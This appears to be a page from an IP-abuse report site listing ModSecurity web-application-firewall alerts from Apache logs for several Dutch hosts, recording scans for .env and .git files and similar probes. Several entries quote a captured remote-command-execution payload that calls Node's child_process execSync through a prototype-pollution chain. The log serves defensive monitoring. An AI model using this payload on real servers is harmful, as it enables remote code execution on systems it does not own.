|
πΊπΈ
54.161.108.155
|
|
27/Mar/2026:07:10:30.930831 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
27/Mar/2026:07:10:30.930831 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 54.161.108.155] ModSecurity: Warning. Pattern match "(?:\\\\\\\\$(?:\\\\\\\\((?:\\\\\\\\(.*\\\\\\\\)|.*)\\\\\\\\)|\\\\\\\\{.*\\\\\\\\})|[<>]\\\\\\\\(.*\\\\\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "367"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rc
...
show less
|
Web App Attack
|
|
π³π±
195.178.110.223
|
|
27/Mar/2026:05:32:39.382293 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
27/Mar/2026:05:32:39.382293 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.223] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "mak.vetspons.nl"] [uri "/.env"] [unique_id "acYIZ36LRTnHCnBagBCLWAAAACY"]
27/Mar/2026:05:32:39.382293 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.223] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"
...
show less
|
Web App Attack
|
|
π·πΊ
91.215.85.43
|
|
27/Mar/2026:04:25:09.091804 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
27/Mar/2026:04:25:09.091804 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 91.215.85.43] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "www.jordymarije.nl"] [uri "/"] [unique_id "acX4lYE086v0EUkmUbXxdQAAAAk"]
27/Mar/2026:04:25:09.091804 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at T
...
show less
|
Web App Attack
|
|
π³π±
195.178.110.190
|
|
27/Mar/2026:04:00:16.719218 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
27/Mar/2026:04:00:16.719218 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.190] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "ramongames.nl"] [uri "/.git/config"] [unique_id "acXywI4nrQeiug18lolKXQAAAAg"]
27/Mar/2026:04:00:16.719218 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.190] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME.
...
show less
|
Web App Attack
|
|
π¦πΊ
170.64.169.163
|
|
27/Mar/2026:03:18:59.795255 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
27/Mar/2026:03:18:59.795255 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 170.64.169.163] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "im.vetspons.nl"] [uri "/.env"] [unique_id "acXpEy7vAhZS7RAZ-IO_BwAAAAI"]
27/Mar/2026:03:18:59.795255 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 170.64.169.163] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [
...
show less
|
Web App Attack
|
|
π³π±
195.178.110.187
|
|
27/Mar/2026:03:11:05.208548 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
27/Mar/2026:03:11:05.208548 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.187] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "radio.vetspons.nl"] [uri "/.git/config"] [unique_id "acXnOenMfuOL7vc-WKq8NwAAAAc"]
27/Mar/2026:03:11:05.208548 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.187] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILEN
...
show less
|
Web App Attack
|
|
π©πͺ
192.109.200.196
|
|
27/Mar/2026:02:19:18.048564 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
27/Mar/2026:02:19:18.048564 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 192.109.200.196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "ramongames.nl"] [uri "/.env"] [unique_id "acXbFrKc-krk7uvFvF3-KgAAAA4"]
27/Mar/2026:02:19:18.048564 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 192.109.200.196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"]
...
show less
|
Web App Attack
|
|
π³π±
204.76.203.25
|
|
27/Mar/2026:00:42:35.539825 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
27/Mar/2026:00:42:35.539825 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "ex.vetspons.nl"] [uri "/.env"] [unique_id "acXEa9jiEXmX2tb7Gur6GgAAAAY"]
27/Mar/2026:00:42:35.539825 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [li
...
show less
|
Web App Attack
|
|
π³π±
195.178.110.190
|
|
27/Mar/2026:00:29:27.381169 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
27/Mar/2026:00:29:27.381169 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.190] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "office.vetspons.nl"] [uri "/.git/config"] [unique_id "acXBV8N0Xas5TuClMqpPHQAAAAE"]
27/Mar/2026:00:29:27.381169 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.190] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILE
...
show less
|
Web App Attack
|
|
π³π±
45.148.10.23
|
|
27/Mar/2026:00:29:03.441272 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
27/Mar/2026:00:29:03.441272 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 45.148.10.23] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "mak.vetspons.nl"] [uri "/.git/config"] [unique_id "acXBP1kcrNjBZ5OEbbrg-AAAAAs"]
27/Mar/2026:00:29:03.441272 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 45.148.10.23] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [fi
...
show less
|
Web App Attack
|
|
π―π΅
18.183.23.166
|
|
27/Mar/2026:00:18:12.217378 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
27/Mar/2026:00:18:12.217378 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 18.183.23.166] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "ins.vetspons.nl"] [uri "/.git/config"] [unique_id "acW-tA53-I-FEMFfBcZuFgAAAAM"]
27/Mar/2026:00:18:12.217378 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 18.183.23.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVAL
...
show less
|
Web App Attack
|
|
πΊπΈ
185.8.106.156
|
|
26/Mar/2026:23:41:00.689965 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
26/Mar/2026:23:41:00.689965 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 185.8.106.156] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "ins.vetspons.nl"] [uri "/"] [unique_id "acW1_AqHTFJec6xDQZ44iQAAAAA"]
26/Mar/2026:23:41:00.689965 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 185.8.106.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX
...
show less
|
Web App Attack
|
|
πΊπΈ
216.81.200.75
|
|
26/Mar/2026:22:01:54.988636 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
26/Mar/2026:22:01:54.988636 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 216.81.200.75] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "familievandemaat.nl"] [uri "/.git/config"] [unique_id "acWewqCao6_D-nGa6cavNQAAAAs"]
26/Mar/2026:22:01:54.988636 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 216.81.200.75] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAM
...
show less
|
Web App Attack
|
|
π³π±
45.148.10.4
|
|
26/Mar/2026:22:00:59.876314 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
26/Mar/2026:22:00:59.876314 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 45.148.10.4] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "im.vetspons.nl"] [uri "/"] [unique_id "acWeixv79JKEAjoqu1WvEQAAAAk"]
26/Mar/2026:22:00:59.876314 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 45.148.10.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anom
...
show less
|
Web App Attack
|
|
π³π±
195.178.110.223
|
|
26/Mar/2026:21:58:34.149311 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
26/Mar/2026:21:58:34.149311 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.223] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "ramongames.nl"] [uri "/.env"] [unique_id "acWd-vgtOsIsbrayDnyVNAAAABo"]
26/Mar/2026:21:58:34.149311 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.223] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"]
...
show less
|
Web App Attack
|
|
πΊπΈ
35.164.170.136
|
|
26/Mar/2026:20:28:43.341975 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
26/Mar/2026:20:28:43.341975 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 35.164.170.136] ModSecurity: Warning. Match of "rx ^(?:(?:\\\\\\\\*|[^\\\\"(),\\\\\\\\/:;<=>?![\\\\\\\\x5c\\\\\\\\]{}]+)\\\\\\\\/(?:\\\\\\\\*|[^\\\\"(),\\\\\\\\/:;<=>?![\\\\\\\\x5c\\\\\\\\]{}]+))(?:\\\\\\\\s*+;\\\\\\\\s*+(?:(?:charset\\\\\\\\s*+=\\\\\\\\s*+(?:\\\\"?(?:iso-8859-15?|windows-1252|utf-8)\\\\\\\\b\\\\"?))|(?:(?:c(?:h(?:a(?:r(?:s(?:e[^t\\\\"(),\\\\\\\\/:;<=>?![\\\\\\\\x5c\\\\\\\\]{}]|[^e\\\\"(),/:;<=>?![\\\\\\\\x5c ..." against "REQUEST_HEADERS:Accept" required. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1162"] [id "920600"] [msg "Illegal Accept header: charset parameter"] [data "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [hostname "mak.vet
...
show less
|
Web App Attack
|
|
πΊπΈ
103.149.130.42
|
|
26/Mar/2026:20:23:07.064478 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
26/Mar/2026:20:23:07.064478 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 103.149.130.42] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "mak.vetspons.nl"] [uri "/"] [unique_id "acWHm5AOck4KiuchP028NAAAAAo"]
26/Mar/2026:20:23:07.064478 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 103.149.130.42] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at
...
show less
|
Web App Attack
|
|
π«π·
185.177.72.50
|
|
26/Mar/2026:19:48:29.765009 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
26/Mar/2026:19:48:29.765009 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 185.177.72.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "jordymarije.nl"] [uri "/.env.production"] [unique_id "acV_fcbWOD1I9__15wD2wwAAAAw"]
26/Mar/2026:19:48:29.765009 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING
...
show less
|
Web App Attack
|
|
π¨π¦
3.98.138.109
|
|
26/Mar/2026:19:43:43.722129 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
26/Mar/2026:19:43:43.722129 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 3.98.138.109] ModSecurity: Warning. Pattern match "(?:\\\\\\\\$(?:\\\\\\\\((?:\\\\\\\\(.*\\\\\\\\)|.*)\\\\\\\\)|\\\\\\\\{.*\\\\\\\\})|[<>]\\\\\\\\(.*\\\\\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "367"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"
...
show less
|
Web App Attack
|
|
π―π΅
13.158.74.166
|
|
26/Mar/2026:19:20:55.451405 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
26/Mar/2026:19:20:55.451405 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 13.158.74.166] ModSecurity: Warning. Pattern match "(?:\\\\\\\\$(?:\\\\\\\\((?:\\\\\\\\(.*\\\\\\\\)|.*)\\\\\\\\)|\\\\\\\\{.*\\\\\\\\})|[<>]\\\\\\\\(.*\\\\\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "367"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce
...
show less
|
Web App Attack
|
|
πΊπΈ
52.41.217.32
|
|
26/Mar/2026:19:11:35.318651 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
26/Mar/2026:19:11:35.318651 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 52.41.217.32] ModSecurity: Warning. Pattern match "(?:\\\\\\\\$(?:\\\\\\\\((?:\\\\\\\\(.*\\\\\\\\)|.*)\\\\\\\\)|\\\\\\\\{.*\\\\\\\\})|[<>]\\\\\\\\(.*\\\\\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "367"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"
...
show less
|
Web App Attack
|
|
π³π±
46.151.178.13
|
|
26/Mar/2026:19:10:40.743740 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
26/Mar/2026:19:10:40.743740 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 46.151.178.13] ModSecurity: Warning. Match of "within %{tx.allowed_methods}" against "REQUEST_METHOD" required. [file "/usr/share/modsecurity-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf"] [line "44"] [id "911100"] [msg "Method is not allowed by policy"] [data "PROPFIND"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272/220/274"] [tag "PCI/12.1"] [hostname "141.224.196.208"] [uri "/"] [unique_id "acV2oIUwKO7u2LkzZvemcgAAABg"]
26/Mar/2026:19:10:40.743740 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 46.151.178.13] ModSecurity: Warning. Pattern match "^[\\\\\\\\d.:]+$" at REQUEST_HEADERS:Host. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "736"] [id "920350"] [msg "H
...
show less
|
Web App Attack
|
|
πΊπΈ
83.142.53.49
|
|
26/Mar/2026:19:03:37.346415 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
26/Mar/2026:19:03:37.346415 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 83.142.53.49] ModSecurity: Warning. Match of "within %{tx.allowed_request_content_type}" against "TX:content_type" required. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "957"] [id "920420"] [msg "Request content type is not allowed by policy"] [data "|text/plain|"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153"] [tag "PCI/12.1"] [hostname "familievandemaat.nl"] [uri "/xmlrpc.php"] [unique_id "acV0-RTeHk8JlmHeCJbPSQAAAAE"]
26/Mar/2026:19:03:37.346415 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 83.142.53.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKIN
...
show less
|
Web App Attack
|
|
π·π΄
2.57.122.173
|
|
26/Mar/2026:18:22:54.359978 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
